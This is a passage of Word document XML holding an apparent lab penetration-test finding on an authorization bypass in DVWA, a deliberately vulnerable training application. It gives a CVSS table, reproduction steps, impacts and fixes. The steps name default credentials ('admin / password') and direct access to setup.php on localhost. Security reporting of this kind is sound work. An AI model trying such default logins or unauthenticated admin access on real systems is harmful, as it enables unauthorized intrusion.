        <w:spacing w:before="240" w:after="240" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">The application was found vulnerable to an </w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B" w:rsidR="4ED5804C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> bypass vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve"> due to weak authentication and access control enforcement. During testing, it was observed that access to privileged functionality could be obtained without valid </w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B" w:rsidR="692279C5">
        <w:t>authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve"> checks. By exploiting weak authentication logic or directly accessing protected application components, </w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B" w:rsidR="4AE70BDD">
        <w:t>unauthorized</w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve"> users could gain access to administrative functionality. This demonstrates that the application fails to properly enforce role-based access restrictions and does not adequately validate whether a user is </w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B" w:rsidR="6B895520">
        <w:t>authorized</w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve"> to access sensitive functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="1E74A219" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5DD80BF7" w14:paraId="3E515F98" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>CVSS Breakdown</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>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4680"/>
      </w:tblGrid>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="6A693571" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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70ACE5DC" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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32A49FAE" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value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55436EAB" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="7E0EE235"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36EA56C3" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Version</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438CC55F" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.1</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F115755" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Common Vulnerability Scoring System version used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="4E27E20F"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4FC8E4F0" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Vector (AV)</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57944CC7" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N (Network)</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7B0E0431" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The vulnerability can be exploited remotely over a network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="2D81B9A6"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55DF45E" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Complexity (AC)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6730F292" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>L (Low)</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63E54AE" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation is straightforward and does not require special conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="10F03FF3"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00D422C9" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privileges Required (PR)</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6539923D" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">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6FBC4F21" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No authentication or prior access is required to exploit the vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="4C9A79E9"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6857FE37" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User Interaction (UI)</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9325370" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">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6C838CD0" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No action from another user is required for successful exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="6D3F8175"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731E8C6F" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope (S)</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63897FA1" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>U (Unchanged)</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14D157CD" w:rsidRDefault="14D157CD" w14:paraId="161C9FF6" w14:textId="154790FC">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Impact remains within the same application boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="3D75D208"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321D6DCD" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confidentiality Impact (C)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19785968" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">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68220A91" w:rsidRDefault="68220A91" w14:paraId="344FD6A3" w14:textId="5D0795E6">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sensitive data exposure possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="04411D88"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3556E9AA" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Integrity Impact (I)</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736490B8" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">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A162EFF" w:rsidRDefault="0A162EFF" w14:paraId="4524B929" w14:textId="1C316315">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unauthorized modification possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="04641635"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5CE82F52" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Availability Impact (A)</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EE2AE89" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>H (High)</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5343166A" w:rsidRDefault="5343166A" w14:paraId="57A072C0" w14:textId="7E00A0E6">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Service disruption possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="10878F7E"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2C68AE55" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Overall Score</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2448FE25" w14:textId="443F0B81">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="52EB9970">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Critical)</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36FC7C2E" w:rsidRDefault="36FC7C2E" w14:paraId="40B1A7D8" w14:textId="580263B1">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severe business and security impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="6947CC02" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5DD80BF7" w14:paraId="39588C7C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="799A4918" w14:paraId="1EEFC179" w14:textId="2C95AFA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to the DVWA login page: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="799A4918" w14:paraId="27FD7012" w14:textId="41EC92FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>http://localhost:4280/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="799A4918" w14:paraId="5D4B9A53" w14:textId="3AF1F934">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Intercept authentication traffic using Burp Suite. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="799A4918" w14:paraId="02043521" w14:textId="72CEFC33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attempt authentication bypass using weak/default credentials: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="799A4918" w14:paraId="62B4F189" w14:textId="643CD43F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>admin / password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="799A4918" w14:paraId="7A5224D9" w14:textId="0EF51867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OR test direct access to privileged resources:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="799A4918" w14:paraId="7CAAE99D" w14:textId="74B6F4F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>http://localhost:4280/setup.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="799A4918" w14:paraId="7F14F066" w14:textId="325C301A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Observe whether the application allows access without proper privilege validation. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="799A4918" w14:paraId="6D84E936" w14:textId="1057282E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Verify access to sensitive or administrative functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="7385D584" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5DD80BF7" w14:paraId="633B1576" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="037AE55E" w14:paraId="162FD417" w14:textId="4133C0DF">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35342AB1" wp14:editId="4C30BDA5">
            <wp:extent cx="6400800" cy="3914775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49898524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985245" name="Picture 498985245"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="3914775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="62745AAC" w14:textId="6170793C">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="61C90434" w:rsidP="61C90434" w:rsidRDefault="61C90434" w14:paraId="7C58FF31" w14:textId="41ACD685">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="0C24E0BA" w14:textId="14C286CE">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5DD80BF7" w14:paraId="4168D909" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5DD80BF7" w14:paraId="15AA3832" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>This vulnerability exposes the application to the following risks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="152BC976" w14:paraId="07040C59" w14:textId="7EFE704F">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>This vulnerability allows unauthorized users to access privileged application functionality without proper authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="152BC976" w14:paraId="2212B4E6" w14:textId="76F5AB52">
      <w:r>
        <w:t>Potential impacts include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="152BC976" w14:paraId="09637CFF" w14:textId="3C3257CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unauthorized administrative access </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="152BC976" w14:paraId="5AA709BE" w14:textId="5E2C9FFD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Application reconfiguration </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="152BC976" w14:paraId="65FF7185" w14:textId="03F40704">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security setting manipulation </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="152BC976" w14:paraId="64BBE0A1" w14:textId="310BC022">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sensitive information disclosure </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="152BC976" w14:paraId="51AB056F" w14:textId="06C91B57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Privilege escalation </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="152BC976" w14:paraId="28F24F98" w14:textId="112D0019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Complete application compromise </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="152BC976" w14:paraId="04F195C7" w14:textId="250702A0">
      <w:r>
        <w:t>Because access control is a foundational security control, failure in authorization validation creates a critical business risk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="12AE1012" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5DD80BF7" w14:paraId="67FA9BB2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Recommended Fix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="012C11CF" w14:paraId="0349A909" w14:textId="1801BF91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Enforce strict server-side authorization validation </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="012C11CF" w14:paraId="49361CB0" w14:textId="0A8E2A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Implement role-based access control (RBAC) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="012C11CF" w14:paraId="6B24D894" w14:textId="4AA79A91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Restrict administrative functionality to authenticated privileged users only </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="012C11CF" w14:paraId="77B4626A" w14:textId="495EBAFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Deny direct access to sensitive endpoints without authorization checks </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="012C11CF" w14:paraId="7FB211A2" w14:textId="01C21F46">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Remove or secure setup/configuration pages in production deployments </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="012C11CF" w14:paraId="3B9F1803" w14:textId="12B14373">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Implement session validation for every privileged request </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="012C11CF" w14:paraId="646A73AD" w14:textId="2B8771D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Conduct regular access control security reviews </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="012C11CF" w14:paraId="232F0109" w14:textId="28F22ADF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t>Perform authorization-focused penetration testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="7B9CBBF6" w14:textId="26BA6B49">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="343324A6" w14:textId="2E23FEBC">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="364267B9" w14:textId="7C653A74">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
